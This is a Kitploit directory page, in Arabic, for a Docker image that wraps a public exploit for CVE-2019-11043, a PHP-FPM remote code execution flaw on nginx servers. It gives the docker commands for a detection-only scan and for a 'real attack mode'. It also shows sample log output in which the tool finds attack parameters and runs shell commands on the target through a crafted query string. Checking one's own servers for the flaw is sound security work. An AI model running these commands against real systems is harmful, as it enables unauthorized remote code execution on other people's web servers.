Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
docker-CVE-2019-11043 — صورة Docker وأوامر للتحقق من ثغرة CVE-2019-11043 على تطبيقات nginx/php-fpm. | Kitploit
أدوات/GitHubGitHub/ypereirareis/docker-cve-2019-11043
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubypereirareis/docker-cve-2019-11043

docker-CVE-2019-11043

صورة Docker وأوامر للتحقق من ثغرة CVE-2019-11043 على تطبيقات nginx/php-fpm.

عرض المستودع
821منذ 6 سنواتلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

صورة Docker وأوامر لفحص CVE-2019-11043

Build Status

  • CVE: CVE-2019-11043
  • الوصف: في إصدارات PHP 7.1.x الأقل من 7.1.33، و7.2.x الأقل من 7.2.24، و7.3.x الأقل من 7.3.11 في بعض تكوينات إعداد FPM، من الممكن أن يتسبب وحدة FPM في الكتابة بعد المخازن المخصصة إلى المساحة المحجوزة لبيانات بروتوكول FCGI، مما يفتح إمكانية تنفيذ التعليمات البرمجية عن بُعد.
  • التفاصيل: https://nvd.nist.gov/vuln/detail/CVE-2019-11043
  • استغلال GitHub: https://github.com/neex/phuip-fpizdam

المساعدة

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043
docker run --rm ypereirareis/cve-2019-11043 -h

فحص موقع ويب أو رابط URL

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/index.php

مثال على نتيجة الثغرة:

https://github.com/neex/phuip-fpizdam#playground-environment

وضع الفحص فقط

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 --only-qsl http://127.0.0.1:8080/script.php
2019/10/30 10:55:35 Base status code is 200
2019/10/30 10:55:35 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 10:55:35 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 10:55:35 Detect() found QSLs and that's it

وضع الهجوم الحقيقي

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 http://127.0.0.1:8080/script.php 
2019/10/30 11:03:33 Base status code is 200
2019/10/30 11:03:33 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 11:03:33 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 11:03:33 Attack params found: --qsl 1760 --pisos 55 --skip-detect
2019/10/30 11:03:33 Trying to set "session.auto_start=0"...
2019/10/30 11:03:33 Detect() returned attack params: --qsl 1760 --pisos 55 --skip-detect <-- REMEMBER THIS
2019/10/30 11:03:33 Performing attack using php.ini settings...
2019/10/30 11:03:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/30 11:03:33 Trying to cleanup /tmp/a...
2019/10/30 11:03:33 Done!

Exploit

مثال على عدم وجود ثغرة:

root@kitploit:~
$ docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/wp_admin.php
2019/10/28 09:41:30 Base status code is 200
2019/10/28 09:41:32 Detect() returned error: no qsl candidates found, invulnerable or something wrong

بناء صورة Docker

root@kitploit:~
docker build -t ypereirareis/cve-2019-11043 .
تنزيل الأداة